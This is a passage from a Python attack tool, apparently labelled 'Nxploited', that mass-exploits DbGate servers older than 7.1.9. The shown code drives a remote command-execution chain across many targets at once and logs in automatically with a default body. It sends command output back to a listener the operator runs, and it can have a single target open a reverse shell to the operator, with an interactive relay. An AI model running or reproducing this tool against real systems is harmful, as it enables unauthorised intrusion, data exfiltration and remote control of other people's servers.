    as ``"fail"`` rather than propagated.
    """
    client = DbGateExploit(
        target,
        timeout=timeout,
        verify_ssl=verify_ssl,
        token=token,
        login_body=login_body,
    )

    # Snapshot the per-target hit count before anything is sent.
    key = exfil_target_key(target)
    with ExfilHandler._lock:
        baseline = len(ExfilHandler.hits_by_target.get(key, []))

    chain_args = dict(
        command=command,
        callback_url=callback_url,
        vector=vector,
        check_only=check_only,
        async_exec=async_exec,
        b64_exfil=b64_exfil,
        wait_exfil=wait_exfil,
        target_exfil_baseline=baseline,
    )
    try:
        outcome = await client.full_chain(**chain_args)
    except Exception as exc:
        log_fail(f"[{client.tag}] {exc}")
        return "fail"
    return outcome


async def mass_scan(
    targets: List[str],
    command: str,
    callback_url: Optional[str],
    vector: str,
    check_only: bool,
    concurrency: int,
    timeout: float,
    verify_ssl: bool,
    token: Optional[str],
    login_body: Optional[Dict[str, Any]],
    async_exec: bool,
    b64_exfil: bool,
    wait_exfil: float,
    target_commands: Optional[Dict[str, str]] = None,
) -> Dict[str, int]:
    """Run ``scan_one`` over every target and tally the result codes.

    At most ``concurrency`` scans run at once. A per-target entry in
    ``target_commands`` overrides ``command`` when it is non-empty. After
    each target finishes, a single-line progress counter is reprinted and
    failed targets are appended to ``OUT_FAIL``.

    Returns:
        Mapping of result code to count; always contains the keys
        ``exfil``, ``dispatch``, ``vuln`` and ``fail``.
    """
    gate = asyncio.Semaphore(concurrency)
    tally_lock = asyncio.Lock()
    stats: Dict[str, int] = dict.fromkeys(("exfil", "dispatch", "vuln", "fail"), 0)
    total = len(targets)
    finished = 0

    async def worker(t: str) -> None:
        nonlocal finished
        effective_cmd = (target_commands or {}).get(t) or command
        # Only the scan itself is throttled; bookkeeping happens afterwards.
        async with gate:
            outcome = await scan_one(
                t, effective_cmd, callback_url, vector, check_only,
                timeout, verify_ssl, token, login_body,
                async_exec, b64_exfil, wait_exfil,
            )
        async with tally_lock:
            stats[outcome] = stats.get(outcome, 0) + 1
            finished += 1
            percent = finished / total * 100
            print(
                f"{Fore.CYAN}[{finished:>5}/{total} {percent:5.1f}%] "
                f"{Fore.MAGENTA}EXFIL={stats['exfil']} "
                f"{Fore.GREEN}DISP={stats['dispatch']} "
                f"{Fore.YELLOW}VULN={stats['vuln']} "
                f"{Fore.RED}FAIL={stats['fail']}"
                f"{Style.RESET_ALL}",
                end="\r",
            )
            if outcome == "fail":
                save_line(OUT_FAIL, t)

    pending = [asyncio.create_task(worker(item)) for item in targets]
    try:
        await asyncio.gather(*pending)
    except KeyboardInterrupt:
        for job in pending:
            job.cancel()
    # Terminate the carriage-return progress line.
    print()
    return stats


# ── interactive wizard ───────────────────────────────────────────────────────

def show_banner() -> None:
    """Clear the terminal and print the coloured start-up banner."""
    clear_cmd = "cls" if os.name == "nt" else "clear"
    os.system(clear_cmd)

    width = 84
    heavy_rule = Fore.MAGENTA + "═" * width + Style.RESET_ALL
    light_rule = Fore.MAGENTA + "─" * width + Style.RESET_ALL
    title = "  DbGate JSON Runner — Interactive Assessment".center(width)
    bullets = (
        "Mode   : AUTO — one question (URL or list file), rest is automatic",
        "Auto   : token · listener · port 3000 · vector=both · output→Nx/",
        f"Output : {OUT_DIR}/  (vuln · dispatch · exfil · failed · list_report)",
        "CLI    : python Nx.py --cli -u http://host:3000  (full flags)",
        "Revsh  : --cli -u URL --reverse-shell [LHOST:LPORT]  (default LAN:4444)",
        "Note   : DbGate >= 7.1.9 is patched",
    )

    print(heavy_rule)
    print(Fore.WHITE + Style.BRIGHT + title + Style.RESET_ALL)
    print(light_rule)
    for text in bullets:
        print(Fore.CYAN + f"  • {text}" + Style.RESET_ALL)
    print(Fore.GREEN + Style.BRIGHT + "  By: Nxploited".center(width) + Style.RESET_ALL)
    print(heavy_rule)
    print()


def ask(prompt: str, default: str = "") -> str:
    """Prompt on stdin and return the stripped answer.

    An empty answer, EOF, or Ctrl-C yields ``default``.
    """
    try:
        answer = input(f"{Fore.CYAN}  ▸ {prompt} [{default}]: {Style.RESET_ALL}")
    except (EOFError, KeyboardInterrupt):
        return default
    answer = answer.strip()
    return answer or default


def ask_yes(prompt: str, default: str = "n") -> bool:
    """Ask a yes/no question; only y, yes, 1 or true (any case) count as yes."""
    affirmative = ("y", "yes", "1", "true")
    answer = ask(prompt, default).lower()
    return answer in affirmative


def ask_int(prompt: str, default: int, lo: int = 1, hi: int = 10000) -> int:
    """Keep prompting until an integer within ``[lo, hi]`` is entered."""
    while True:
        text = ask(prompt, str(default))
        try:
            value = int(text)
        except ValueError:
            value = None
        if value is not None and lo <= value <= hi:
            return value
        log_warn(f"Enter a number between {lo} and {hi}")


def ask_float(prompt: str, default: float, lo: float = 0.0, hi: float = 600.0) -> float:
    """Keep prompting until a float within ``[lo, hi]`` is entered."""
    while True:
        text = ask(prompt, str(default))
        try:
            value = float(text)
        except ValueError:
            value = None
        if value is not None and lo <= value <= hi:
            return value
        log_warn(f"Enter a number between {lo} and {hi}")


class RunConfig:
    """Mutable bag of settings for one run, pre-filled with defaults.

    Instances are created with no arguments and then adjusted field by
    field by the wizard or the CLI front end.
    """

    def __init__(self) -> None:
        # --- what to scan ---
        self.mode: str = "single"
        self.url: str = ""
        self.targets_file: str = DEFAULT_TARGETS
        self.default_port: int = DEFAULT_PORT
        self.resolved_targets: List[str] = []
        self.target_commands: Dict[str, str] = {}

        # --- what to run ---
        self.check_only: bool = False
        self.command: str = "id"
        self.vector: str = "functionName"
        self.async_exec: bool = False

        # --- authentication ---
        self.token: Optional[str] = None
        self.login_json: str = '{"amoid":"none"}'
        self.login_body: Optional[Dict[str, Any]] = None

        # --- transport ---
        self.threads: int = DEFAULT_CONCURRENCY
        self.timeout: float = DEFAULT_TIMEOUT
        self.verify_ssl: bool = False

        # --- HTTP callback channel ---
        self.use_callback: bool = True
        self.use_builtin_listener: bool = True
        self.callback_url: Optional[str] = None
        self.callback_host: str = ""
        self.listen_bind: str = "0.0.0.0"
        self.listen_port: int = DEFAULT_CALLBACK_PORT
        self.b64_exfil: bool = True
        self.wait_exfil: float = 8.0
        self.mass_wait_exfil: float = 8.0

        # --- reverse TCP channel ---
        self.reverse_shell: bool = False
        self.revsh_lhost: str = ""
        self.revsh_lport: int = DEFAULT_REVSH_PORT
        self.revsh_bind: str = "0.0.0.0"
        self.wait_revsh: float = 15.0
        self.revsh_interactive: bool = False


def detect_target_input(raw: str) -> Tuple[str, str, str]:
    """Classify the wizard's single answer as a URL or a list file.

    Accepted shapes are ``target``, ``target|command`` and ``@file``. A
    target is treated as a list file when it exists on disk, or when it is
    not an http(s) URL and ends in ``.txt``.

    Args:
        raw: The text typed by the user.

    Returns:
        ``(mode, target, command)`` where ``mode`` is ``"mass"`` or
        ``"single"`` and ``command`` is ``""`` when none was given. If the
        target part is empty (blank input, ``|cmd``, or a bare ``@``) the
        default local URL is used so callers never receive an empty target.
    """
    default_target = "http://127.0.0.1:3000"

    # partition() leaves cmd empty when there is no "|" separator.
    target, _, cmd = raw.strip().partition("|")
    target = target.strip()
    cmd = cmd.strip()
    if target.startswith("@"):
        target = target[1:].strip()

    # Same fallback as blank input, but keep any command that was supplied.
    if not target:
        return "single", default_target, cmd

    is_url = re.match(r"^https?://", target, re.I) is not None
    looks_like_file = os.path.isfile(target) or (
        not is_url and target.endswith(".txt")
    )
    return ("mass" if looks_like_file else "single"), target, cmd


def apply_auto_defaults(cfg: RunConfig) -> None:
    """Overwrite ``cfg`` with the wizard's fixed AUTO settings.

    Everything except the callback address is a constant; the callback host
    comes from ``guess_lan_ip()`` and the callback URL is built from that
    host and the listener port.
    """
    fixed_settings = {
        "login_body": {"amoid": "none"},
        "token": None,
        "default_port": DEFAULT_PORT,
        "timeout": DEFAULT_TIMEOUT,
        "verify_ssl": False,
        "vector": "both",
        "check_only": False,
        "command": "id",
        "async_exec": False,
        "b64_exfil": True,
        "wait_exfil": 8.0,
        "use_callback": True,
        "use_builtin_listener": True,
        "listen_bind": "0.0.0.0",
        "listen_port": DEFAULT_CALLBACK_PORT,
        "threads": DEFAULT_CONCURRENCY,
        "mass_wait_exfil": 8.0,
    }
    for field_name, value in fixed_settings.items():
        setattr(cfg, field_name, value)

    # Derived values: need listen_port to be set first.
    cfg.callback_host = guess_lan_ip()
    cfg.callback_url = build_callback_url(cfg.callback_host, cfg.listen_port)


def print_auto_summary(cfg: RunConfig) -> None:
    """Log the effective AUTO configuration, framed by blank lines."""
    if cfg.mode == "mass":
        rows = [
            f"  Mode      : mass  file={cfg.targets_file}",
            f"  Threads   : {cfg.threads}",
        ]
    else:
        rows = [f"  Mode      : single  target={cfg.url}"]
    rows.extend(
        (
            "  Auth      : POST /auth/login → Bearer (automatic)",
            f"  Command   : {cfg.command}",
            f"  Vector    : {cfg.vector}",
            f"  Callback  : {cfg.callback_url}",
            f"  Listener  : {cfg.listen_bind}:{cfg.listen_port}",
        )
    )

    print()
    log_info("AUTO configuration")
    for row in rows:
        log_info(row)
    print()


def run_wizard() -> RunConfig:
    """Ask the single wizard question and return a fully populated config.

    The answer may be a URL, a list file, or ``URL|command``. Exits the
    process with status 1 when a list file was given but does not exist.
    """
    show_banner()
    log_info("AUTO — one question (optional: URL|command  e.g. http://ip:3000|ls -la)")
    answer = ask("Target URL  or  list.txt", "http://127.0.0.1:3000")
    mode, target, opt_cmd = detect_target_input(answer)

    cfg = RunConfig()
    cfg.mode = mode
    if mode != "mass":
        cfg.url = ensure_target_url(target, DEFAULT_PORT)
    else:
        cfg.targets_file = target
        if not os.path.isfile(cfg.targets_file):
            log_fail(f"List file not found: {cfg.targets_file}")
            sys.exit(1)

    apply_auto_defaults(cfg)
    # A command typed after "|" wins over the AUTO default.
    if opt_cmd:
        cfg.command = opt_cmd
    print_auto_summary(cfg)
    return cfg


async def preflight_verify(cfg: RunConfig) -> bool:
    """Validate the run configuration before anything is sent to a target.

    Side effects: calls ``init_nx_output()``, fills ``cfg.resolved_targets``
    (and ``cfg.target_commands`` in mass mode), writes the list report in
    mass mode, and may set ``cfg.token`` via ``prefetch_token`` in single
    mode.

    Returns:
        True when the run may proceed; False when a blocking problem was
        found (each failure is logged before returning).
    """
    log_info("═══ Preflight verification ═══")
    init_nx_output()

    if cfg.mode == "mass":
        # Mass mode: the list file must exist and yield at least one target.
        if not os.path.isfile(cfg.targets_file):
            log_fail(f"List file missing: {cfg.targets_file}")
            return False
        urls, per_cmds, stats, errors = load_targets_smart(
            cfg.targets_file, cfg.default_port
        )
        write_list_report(
            cfg.targets_file, stats, urls, errors,
            default_port=cfg.default_port, per_cmds=per_cmds,
        )
        cfg.resolved_targets = urls
        cfg.target_commands = per_cmds
        if per_cmds:
            log_info(f"Per-target commands: {len(per_cmds)} line(s) with |command")
        log_info(
            f"List: raw={stats.raw} resolved={stats.resolved} "
            f"dup={stats.dup} invalid={stats.invalid} → {OUT_LIST_REPORT}"
        )
        if stats.resolved == 0:
            log_fail("No valid targets after parsing list — fix list_report.txt")
            return False
        # Invalid lines are reported but do not block the run.
        if stats.invalid > 0:
            log_warn(f"{stats.invalid} invalid lines — see {OUT_LIST_REPORT}")
    else:
        # Single mode: a URL is mandatory.
        if not cfg.url:
            log_fail("No target URL")
            return False
        cfg.resolved_targets = [cfg.url]
        log_info(f"Target normalized: {cfg.url}")

    if cfg.reverse_shell and not cfg.check_only:
        log_info(
            f"Revsh: target should connect to {cfg.revsh_lhost}:{cfg.revsh_lport} "
            f"(listener bind {cfg.revsh_bind})"
        )
        # Reverse TCP mode is restricted to a single target.
        if cfg.mode != "single":
            log_fail("--reverse-shell supports single target (-u) only")
            return False

    if cfg.use_callback and not cfg.check_only and not cfg.reverse_shell:
        # Warn (do not fail) when a loopback callback host is paired with a
        # target whose URL does not look local.
        if cfg.callback_host in ("127.0.0.1", "localhost"):
            tgt = cfg.url or (cfg.resolved_targets[0] if cfg.resolved_targets else "")
            if tgt and "127.0.0.1" not in tgt and "localhost" not in tgt:
                log_warn(
                    "Callback host is localhost but target looks remote — "
                    "exfil may fail; set LAN IP in --callback-host"
                )

    # Single target without a supplied token: confirm reachability and
    # login up front so a failure is reported before the scan starts.
    if cfg.mode == "single" and cfg.url and not cfg.token:
        log_info("Preflight: testing target reachability + auto-login...")
        if not await prefetch_token(cfg):
            log_fail("Preflight failed: cannot reach target or obtain token")
            return False

    log_ok("Preflight passed — starting scan")
    print()
    return True


async def prefetch_token(cfg: RunConfig) -> bool:
    """Obtain a token for the single target ahead of the scan.

    Returns True immediately when a token is already set or no URL is
    configured. Otherwise the target is probed and a login is attempted; on
    success the token is stored in ``cfg.token``.

    Returns:
        False when the target cannot be reached or login fails, else True.
    """
    nothing_to_do = bool(cfg.token) or not cfg.url
    if nothing_to_do:
        return True

    client = DbGateExploit(
        cfg.url,
        timeout=cfg.timeout,
        verify_ssl=cfg.verify_ssl,
        login_body=cfg.login_body or {"amoid": "none"},
    )
    connector = aiohttp.TCPConnector(ssl=cfg.verify_ssl, limit=1)
    async with aiohttp.ClientSession(connector=connector) as session:
        reachable = await client.probe_alive(session)
        if not reachable:
            log_fail(f"[{client.tag}] cannot reach target for login")
            return False
        logged_in = await client.obtain_token(session)
        if not logged_in:
            return False
        cfg.token = client.token
        return True


def write_session_summary(cfg: RunConfig, stats: Dict[str, int]) -> None:
    """Write a JSON summary of the session to ``OUT_SUMMARY``.

    The summary records the session id, selected configuration fields, the
    resolved targets, the result tally and the absolute output directory.
    Writing is best-effort: an ``OSError`` is reported as a warning and the
    run continues.

    Args:
        cfg: Configuration used for the run.
        stats: Result-code counts to record.
    """
    doc = {
        "session": SESSION_ID,
        "mode": cfg.mode,
        "command": cfg.command,
        "vector": cfg.vector,
        "callback": cfg.callback_url,
        "reverse_shell": cfg.reverse_shell,
        "revsh_lhost": cfg.revsh_lhost,
        "revsh_lport": cfg.revsh_lport,
        "targets": cfg.resolved_targets,
        "stats": stats,
        "output_dir": os.path.abspath(OUT_DIR),
    }
    try:
        with open(OUT_SUMMARY, "w", encoding="utf-8") as fh:
            json.dump(doc, fh, indent=2)
    except OSError as exc:
        # Still non-fatal, but tell the operator the summary is missing
        # instead of failing silently.
        log_warn(f"Could not write session summary to {OUT_SUMMARY!r}: {exc}")
    else:
        log_info(f"Summary → {OUT_SUMMARY}")


async def run_from_config(cfg: RunConfig) -> None:
    """Execute a run described by ``cfg`` (single target or mass mode).

    Steps: preflight checks, start whichever local listener the
    configuration calls for, run the scan, report and persist the results,
    then release the listeners.

    Listener cleanup runs in a ``finally`` block so it happens on every exit
    path, including single-target mode and a scan that raises.

    Exits the process with status 1 when preflight fails or a listener
    cannot be started.
    """
    if not await preflight_verify(cfg):
        sys.exit(1)

    exfil_srv: Optional[HTTPServer] = None
    revsh_listener: Optional[TcpRevshListener] = None
    callback_url = cfg.callback_url

    if cfg.reverse_shell and not cfg.check_only:
        if cfg.mode != "single":
            log_fail("--reverse-shell: use -u for one target only")
            sys.exit(1)
        try:
            revsh_listener = TcpRevshListener(cfg.revsh_bind, cfg.revsh_lport)
            actual_revsh_port = revsh_listener.start()
            # The command is built only after binding, from the port that
            # start() actually returned.
            cfg.revsh_lport = actual_revsh_port
            cfg.command = build_reverse_shell_cmd(cfg.revsh_lhost, actual_revsh_port)
            log_ok(
                f"Revsh dial address (from target): "
                f"{cfg.revsh_lhost}:{actual_revsh_port}"
            )
        except OSError as exc:
            log_fail(f"Cannot start reverse-shell listener: {exc}")
            sys.exit(1)

    if (
        cfg.use_builtin_listener
        and cfg.use_callback
        and not cfg.check_only
        and not cfg.reverse_shell
    ):
        try:
            exfil_srv, actual_port = start_exfil_server(
                cfg.listen_bind, cfg.listen_port
            )
            # Rebuild the callback URL from the port actually returned.
            cfg.listen_port = actual_port
            callback_url = build_callback_url(
                cfg.callback_host or guess_lan_ip(), actual_port
            )
            cfg.callback_url = callback_url
            log_ok(f"Callback URL (target must reach this): {callback_url}")
            log_info(f"Listener bind: {cfg.listen_bind}:{actual_port}")
        except OSError as exc:
            log_fail(f"Cannot start exfil listener: {exc}")
            sys.exit(1)

    command = "" if cfg.check_only else cfg.command

    try:
        if cfg.mode == "single":
            client = DbGateExploit(
                cfg.url,
                timeout=cfg.timeout,
                verify_ssl=cfg.verify_ssl,
                token=cfg.token,
                login_body=cfg.login_body,
            )
            result = await client.full_chain(
                command=command,
                callback_url=callback_url if cfg.use_callback else None,
                vector=cfg.vector,
                check_only=cfg.check_only,
                async_exec=cfg.async_exec or cfg.reverse_shell,
                b64_exfil=cfg.b64_exfil,
                wait_exfil=cfg.wait_exfil,
                use_reverse_shell=cfg.reverse_shell,
                wait_revsh=cfg.wait_revsh,
                revsh_listener=revsh_listener,
                revsh_interactive=cfg.revsh_interactive,
            )
            stats: Dict[str, int] = {
                "exfil": 0, "dispatch": 0, "vuln": 0, "fail": 0, "revsh": 0,
            }
            stats[result] = stats.get(result, 0) + 1
            write_session_summary(cfg, stats)
            log_ok(f"Final result: {result.upper()} — {describe_result(result)}")
            if result == "exfil":
                log_ok(f"Per-target exfil → {nx_exfil_path(cfg.url)}")
            elif result == "revsh":
                if cfg.revsh_interactive:
                    log_ok("Reverse TCP session ended — see Nx/revsh.txt")
                else:
                    log_ok(
                        "Reverse TCP verified (connection only) — see Nx/revsh.txt; "
                        "add --revsh-interactive or use: nc -lvnp PORT"
                    )
            elif result == "dispatch":
                if cfg.reverse_shell:
                    log_warn(
                        "Not confirmed: no TCP reverse connection. "
                        "Use an IP reachable from DbGate (Docker: host gateway, not 127.0.0.1)."
                    )
                else:
                    log_warn(
                        "Not confirmed: runner accepted the job but no output hit the listener. "
                        "Try --callback-host with an IP reachable from the DbGate container."
                    )
            return

        targets = cfg.resolved_targets
        if not cfg.check_only and cfg.use_callback and not callback_url:
            log_warn("Mass mode without callback — blind dispatch only")

        log_info(
            f"Mass scan: {len(targets)} targets  threads={cfg.threads}  "
            f"vector={cfg.vector}"
        )

        stats = await mass_scan(
            targets,
            command,
            callback_url if cfg.use_callback else None,
            cfg.vector,
            cfg.check_only,
            # Clamp the requested concurrency to 1..200.
            max(1, min(cfg.threads, 200)),
            cfg.timeout,
            cfg.verify_ssl,
            cfg.token,
            cfg.login_body,
            cfg.async_exec,
            cfg.b64_exfil,
            cfg.wait_exfil if len(targets) == 1 else cfg.mass_wait_exfil,
            cfg.target_commands,
        )

        print(Fore.MAGENTA + "─" * 80 + Style.RESET_ALL)
        log_ok(
            f"Done  EXFIL={stats.get('exfil', 0)}  DISPATCH={stats.get('dispatch', 0)}  "
            f"VULN={stats.get('vuln', 0)}  FAIL={stats.get('fail', 0)}"
        )
        log_ok(f"Results in {os.path.abspath(OUT_DIR)}/")
        write_session_summary(cfg, stats)
    finally:
        # Release local listeners on every exit path.
        if exfil_srv:
            try:
                exfil_srv.shutdown()
                # shutdown() only stops the serve loop; server_close()
                # releases the listening socket.
                exfil_srv.server_close()
            except Exception as exc:
                log_warn(f"Exfil listener did not shut down cleanly: {exc}")
        if revsh_listener:
            revsh_listener.close()


# ── optional CLI mode (--cli) ─────────────────────────────────────────────────

def build_arg_parser() -> argparse.ArgumentParser:
    """Create the argument parser for ``--cli`` mode.

    Without ``--cli`` the program runs the interactive wizard instead, so
    every option here has a default.
    """
    parser = argparse.ArgumentParser(
        description="DbGate assessment — use without --cli for wizard"
    )
    add = parser.add_argument

    # Mode and targets
    add("--cli", action="store_true", help="Use command-line flags instead of wizard")
    add("-u", "--url")
    add("-f", "--file", default=DEFAULT_TARGETS)

    # Action
    add("-c", "--callback")
    add("--cmd", "--command", dest="command", default="id")
    add("--check-only", action="store_true")
    add("--vector", choices=DbGateExploit.VECTORS, default="functionName")

    # Authentication
    add("--token")
    add("--login-json", default='{"amoid":"none"}')

    # Transport
    add("-t", "--threads", type=int, default=DEFAULT_CONCURRENCY)
    add("--timeout", type=float, default=DEFAULT_TIMEOUT)
    add("--port", type=int, default=DEFAULT_PORT)

    # HTTP callback channel
    add("--listen-host", default="0.0.0.0")
    add("--listen-port", type=int, default=DEFAULT_CALLBACK_PORT)
    add("--callback-host", help="IP/hostname targets use to reach your listener")
    add("--async-exec", action="store_true")
    add("--no-b64", action="store_true")
    add("--wait-exfil", type=float, default=8.0)

    # Reverse TCP channel
    add(
        "--reverse-shell",
        nargs="?",
        const="AUTO",
        metavar="LHOST:LPORT",
        help="TCP reverse shell (single -u only). Default: guessed LAN IP:4444",
    )
    add(
        "--revsh-bind",
        default="0.0.0.0",
        help="Local bind address for reverse-shell listener",
    )
    add(
        "--revsh-port",
        type=int,
        default=DEFAULT_REVSH_PORT,
        help="Local port when --reverse-shell has no LHOST:LPORT (default 4444)",
    )
    add(
        "--wait-revsh",
        type=float,
        default=15.0,
        help="Seconds to wait for reverse TCP after dispatch",
    )
    add(
        "--revsh-interactive",
        action="store_true",
        help="After reverse TCP connect, relay stdin/stdout (basic; nc is better for TTY)",
    )

    # Mass mode and TLS
    add(
        "--mass-wait-exfil",
        type=float,
        default=8.0,
        help="Per-target exfil wait in mass mode (default 8s; was capped at 3s)",
    )
    add("--secure", action="store_true", help="Enable TLS certificate verification")
    return parser


async def run_from_cli(args: argparse.Namespace) -> None:
    """Translate parsed CLI flags into a ``RunConfig`` and execute it.

    Exits the process with status 1 when ``--login-json`` cannot be parsed
    or when the ``--reverse-shell`` options are inconsistent (no ``-u``,
    combined with ``--check-only``, or an invalid endpoint).
    """
    login_body, err = parse_login_json(args.login_json)
    if err:
        log_fail(err)
        sys.exit(1)

    cfg = RunConfig()
    # Presence of -u selects single mode; otherwise the list file is used.
    cfg.mode = "single" if args.url else "mass"
    cfg.url = ensure_target_url(args.url, args.port) if args.url else ""
    cfg.targets_file = args.file
    cfg.default_port = args.port
    cfg.check_only = args.check_only
    cfg.command = args.command
    cfg.vector = args.vector
    cfg.token = args.token
    cfg.login_body = login_body
    cfg.threads = args.threads
    cfg.timeout = args.timeout
    # TLS verification is off unless --secure is given.
    cfg.verify_ssl = args.secure
    cfg.async_exec = args.async_exec
    cfg.b64_exfil = not args.no_b64
    cfg.wait_exfil = args.wait_exfil
    cfg.mass_wait_exfil = args.mass_wait_exfil
    # --reverse-shell without a value parses as the const "AUTO", so
    # "is not None" detects the flag in both forms.
    revsh_requested = args.reverse_shell is not None
    if revsh_requested:
        if not args.url:
            log_fail("--reverse-shell requires a single target: -u http://host:3000")
            sys.exit(1)
        if args.check_only:
            log_fail("--reverse-shell cannot be used with --check-only")
            sys.exit(1)
        try:
            lhost, lport = parse_revsh_endpoint(args.reverse_shell, args.revsh_port)
        except (ValueError, OSError) as exc:
            log_fail(f"Invalid --reverse-shell endpoint: {exc}")
            sys.exit(1)
        cfg.reverse_shell = True
        # An explicit --callback-host overrides the host parsed from the endpoint.
        cfg.revsh_lhost = args.callback_host or lhost
        cfg.revsh_lport = lport
        cfg.revsh_bind = args.revsh_bind
        cfg.wait_revsh = args.wait_revsh
        cfg.revsh_interactive = args.revsh_interactive
        # Reverse TCP mode disables the HTTP callback channel entirely.
        cfg.use_callback = False
        cfg.use_builtin_listener = False
        cfg.async_exec = True
        cfg.command = ""  # built after listener bind in run_from_config
        log_info(f"Reverse shell mode → target dials {cfg.revsh_lhost}:{cfg.revsh_lport}")
    else:
        # A callback is used when one was supplied, or when a command will
        # actually run (not --check-only).
        cfg.use_callback = bool(args.callback) or (
            not args.check_only and bool(args.command)
        )
        cfg.callback_url = args.callback
        cfg.listen_bind = args.listen_host
        cfg.listen_port = args.listen_port
        # The built-in listener is only used when no external callback URL
        # was given and this is not a check-only run.
        cfg.use_builtin_listener = not args.callback and not args.check_only
        if cfg.use_builtin_listener and not args.callback:
            cfg.callback_host = args.callback_host or guess_lan_ip()
            if not cfg.callback_url:
                cfg.callback_url = build_callback_url(
                    cfg.callback_host, cfg.listen_port
                )

    await run_from_config(cfg)


async def async_main() -> None:
    """Parse the command line and dispatch to CLI mode or the wizard."""
    args = build_arg_parser().parse_args()
    if not args.cli:
        # Default path: interactive wizard builds the configuration.
        await run_from_config(run_wizard())
        return
    show_banner()
    await run_from_cli(args)


def main() -> None:
    """Synchronous entry point; turns Ctrl-C into a short warning."""
    try:
        entry = async_main()
        asyncio.run(entry)
    except KeyboardInterrupt:
        # Move off any in-progress status line before the message.
        print()
        log_warn("Interrupted")


# Run only when executed as a script, not when imported as a module.
if __name__ == "__main__":
    main()